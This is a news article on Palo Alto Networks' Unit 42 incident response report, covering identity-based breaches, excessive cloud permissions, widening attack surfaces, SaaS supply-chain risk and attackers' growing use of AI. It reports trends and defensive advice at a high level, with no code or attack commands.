Vast majority of breaches enabled by preventable gaps, identity weaknesses says Palo Alto Networks

Enterprises are falling prey to cyber attacks largely due to lack of oversight, preventable errors, and poor identity controls, even as AI attacks become a reality.

This is according to Palo Alto Networks’ Global Incident Response Report 2026, produced by its Unit 42 cyber threat intelligence team, which sourced data from over 750 attacks reported to the organization between October 2024 and September 2025.

In the past year alone, researchers found weak identity controls played a meaningful role in 90% of cyber incidents, with attackers leaning on identity as the most reliable entry point and mechanism for lateral movement.

Indeed, in nearly two-thirds (65%) of cases attackers used identity-based attacks as the initial access point for enterprise systems, with 33% of attacks beginning with phishing and social engineering.

Within this subset of cases, session hijacking and MFA bypass techniques allowed threat actors to quickly access victims’ systems. Attackers also used tried-and-tested entry techniques including using previously stolen credentials (13%), brute force attacks (8%), and insider attacks (8%) to breach systems.

Researchers analyzed over 680,000 cloud identities and discovered that 99% of users, services, and roles had excessive permissions, enabling attackers to easily complete lateral movement through corporate networks after compromising an account.

Back to basics with identity security

Chris George, managing director EMEA at Unit 42, told ITPro that leaders must thoroughly examine their existing identity policies and to be “brilliant at the basics” to close these preventable gaps.

“What user accounts do you have? What is your password policy? How are you making sure that you're choosing non-brute-forceable passwords? How are you looking at the permissions?”

Mastering the basics may be the bare minimum for businesses, as the number of machine identities they have to manage balloon with the deployment of AI agents.

In October ITPro heard from Haider Pasha, EMEA CISO at Palo Alto Networks, who noted that agentic AI will seriously complicate identity security and requires rigorous oversight to be used safely.

George told ITPro that his team has observed over-provisioning of AI copilots, allowing attackers to obtain leaked information by crafting malicious prompts.

“[W]hen we get to the whole agentic side of things, and we've got AI agents that are going to be in their tens, hundreds of thousands, then if each single agent has got a connection to something and has got permission to do things, how are you managing the security around that?”

In the future, George said, threat actors may replicate the kind of ‘living off the land’ techniques we’re currently seeing used against mobile device management (MDM) tools and leaders must ensure their AI systems aren’t compromised.

But he added that even more sophisticated methods such as the malicious use of deepfakes rely on the age-old processes of business email compromise, for which we have established security protocols.

Incidents included in the report’s data cover a wide range of enterprises, including enterprises in the Fortune 500, government organizations, and SMBs, across over 50 countries.

The attack surface is widening

There’s evidence that attackers are widening the net in a bid to achieve greater success against victims, with 87% of intrusions found to involve attacks on two or more attack surfaces and 67% involving activity across three or more.

After identity, the most common attack surface was endpoints at 61% and network at 50%. Researchers found in nearly half (48%) of all investigations, browser activity was also targeted, an increase from the 44% measured in 2024.

For example, researchers cited an incident involving the ClickFix attack technique, in which threat actors used SEO poisoning to trick an employee at an international industrial firm to execute malicious code. The goal was to run malware in system memory, in order to install an infostealer on the employee’s work device.

Supply chain attacks are another severe risk for enterprises. Attackers are increasingly exploiting SaaS environments, which rely on a complex web of interdependencies and permissions linked by APIs and OAuth apps, as well as legitimate vendor tools and open source dependencies.

Almost a quarter (23%) of incidents tracked by researchers in 2025 involved SaaS applications, compared to just 6% in 2022, while 39% of command and control (C2) techniques linked directly to remote access tools with administrator privileges.

Addressing these vulnerabilities will mean taking stock of all systems, permissions, and interdependencies to build a holistic view of one’s attack surface. But George told ITPro that many organizations still struggle with simply cataloguing their systems, let alone protecting them.

“You see, actually, in conversations we've had with the board, they say ‘we didn't even know we had the affected system, because we just don't have it documented’.

“There's a concept of a CMDB – a configuration management database, a list of everything in the company that they own. I’ve very rarely seen anything that's been 100% complete and kept up to date.”

To start with, he said, leaders have to strategize where they can make the most impact in the short term and then think about more radical overhaul.

AI has become a force multiplier – for good and for ill

In addition to traditional attack methods, researchers found threat actors are increasingly using AI to enhance the speed and severity of attacks.

The report noted that AI, particularly models hosted on adversary infrastructure, has been used to discover unpatched vulnerabilities just 15 minutes after a CVE is published, as well as to reduce the manual work needed to run ransomware campaigns.

In lab tests conducted in 2025, Unit 42 was able to use AI to reduce time-to-exfiltration to just 25 minutes. In the real world, attackers are on a similar trajectory, having reduced the figure from 4.8 hours to just 72 minutes from 2024 to 2025.

AI is also used to improve grammar for phishing lures, as well as to produce attack strategies. This lines up with recent reports by other organizations such as Google Threat Intelligence Group, which recently found APTs are using public AI models to translate and localize social engineering messages.

To counter the threat, Palo Alto Networks recommended organizations deploy automated patching, AI-driven security detection and response tools, as well as better monitoring of API calls and internal AI use.

For example, George pointed to the 72 minutes it now takes attackers to move from initial access to data exfiltration – a time frame that can’t be countered without some form of automation.

With greater controls over AI deployment and a focus on leveraging its benefits to empower security teams, he argued that there’s clear hope for defenders.

“AI is, and it will, change the world – there is a huge amount of opportunity.

“But I could say that about every technological change throughout history and I think we should be taking lessons from all of those and refining our approach.”